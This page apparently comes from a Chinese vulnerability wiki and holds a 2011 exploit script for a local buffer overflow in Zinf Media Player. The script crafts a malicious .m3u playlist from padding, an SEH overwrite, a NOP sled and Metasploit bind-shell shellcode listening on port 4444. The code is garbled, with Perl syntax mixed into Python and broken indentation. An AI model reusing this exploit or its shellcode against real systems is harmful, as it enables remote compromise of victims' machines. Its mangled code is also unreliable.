Loading
0

Zinf Media Player本地缓冲区溢出漏洞

PWNWIK.COM

,

EXP

#!/usr/bin/python

import sys

print "########################################################################"
print "# Exploit Title: Zinf Media Player Local Buffer Overflow               #"
print "# Author: Angel Injection                                              #"
print "# Email: email protected                                   #"
print "# Date: 25/8/2011                                                      #"
print "# Home Page: http://1337day.com http://dev-point.com http://sec-krb.org#"
print "########################################################################"


try :

   junk = "\x41" * 1300
   next_seh = "\xEB\x06\x90\x90"
   seh= "\x0C\x04\x05\x12"
   nop = "\x90" * 20
    # win32_bind -  EXITFUNC=calc LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com
my $shellcode =
"\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x9a".
"\xb8\xbb\x46\x83\xeb\xfc\xe2\xf4\x66\xd2\x50\x0b\x72\x41\x44\xb9".
"\x65\xd8\x30\x2a\xbe\x9c\x30\x03\xa6\x33\xc7\x43\xe2\xb9\x54\xcd".
"\xd5\xa0\x30\x19\xba\xb9\x50\x0f\x11\x8c\x30\x47\x74\x89\x7b\xdf".
"\x36\x3c\x7b\x32\x9d\x79\x71\x4b\x9b\x7a\x50\xb2\xa1\xec\x9f\x6e".
"\xef\x5d\x30\x19\xbe\xb9\x50\x20\x11\xb4\xf0\xcd\xc5\xa4\xba\xad".
"\x99\x94\x30\xcf\xf6\x9c\xa7\x27\x59\x89\x60\x22\x11\xfb\x8b\xcd".
"\xda\xb4\x30\x36\x86\x15\x30\x06\x92\xe6\xd3\xc8\xd4\xb6\x57\x16".
"\x65\x6e\xdd\x15\xfc\xd0\x88\x74\xf2\xcf\xc8\x74\xc5\xec\x44\x96".
"\xf2\x73\x56\xba\xa1\xe8\x44\x90\xc5\x31\x5e\x20\x1b\x55\xb3\x44".
"\xcf\xd2\xb9\xb9\x4a\xd0\x62\x4f\x6f\x15\xec\xb9\x4c\xeb\xe8\x15".
"\xc9\xeb\xf8\x15\xd9\xeb\x44\x96\xfc\xd0\xaa\x1a\xfc\xeb\x32\xa7".
"\x0f\xd0\x1f\x5c\xea\x7f\xec\xb9\x4c\xd2\xab\x17\xcf\x47\x6b\x2e".
"\x3e\x15\x95\xaf\xcd\x47\x6d\x15\xcf\x47\x6b\x2e\x7f\xf1\x3d\x0f".
"\xcd\x47\x6d\x16\xce\xec\xee\xb9\x4a\x2b\xd3\xa1\xe3\x7e\xc2\x11".
"\x65\x6e\xee\xb9\x4a\xde\xd1\x22\xfc\xd0\xd8\x2b\x13\x5d\xd1\x16".
"\xc3\x91\x77\xcf\x7d\xd2\xff\xcf\x78\x89\x7b\xb5\x30\x46\xf9\x6b".
"\x64\xfa\x97\xd5\x17\xc2\x83\xed\x31\x13\xd3\x34\x64\x0b\xad\xb9".
"\xef\xfc\x44\x90\xc1\xef\xe9\x17\xcb\xe9\xd1\x47\xcb\xe9\xee\x17".
"\x65\x68\xd3\xeb\x43\xbd\x75\x15\x65\x6e\xd1\xb9\x65\x8f\x44\x96".
"\x11\xef\x47\xc5\x5e\xdc\x44\x90\xc8\x47\x6b\x2e\x6a\x32\xbf\x19".
"\xc9\x47\x6d\xb9\x4a\xb8\xbb\x46";
    f = open("test.m3u" ,"w")
f.write(junk + next_seh + seh + nop + shellcode)
    f.close()

print "* Press Any Key To Exit ...";
$exit=<>;
print $exit ;

PWNWIK.COM==免费、自由、人人可编辑的漏洞库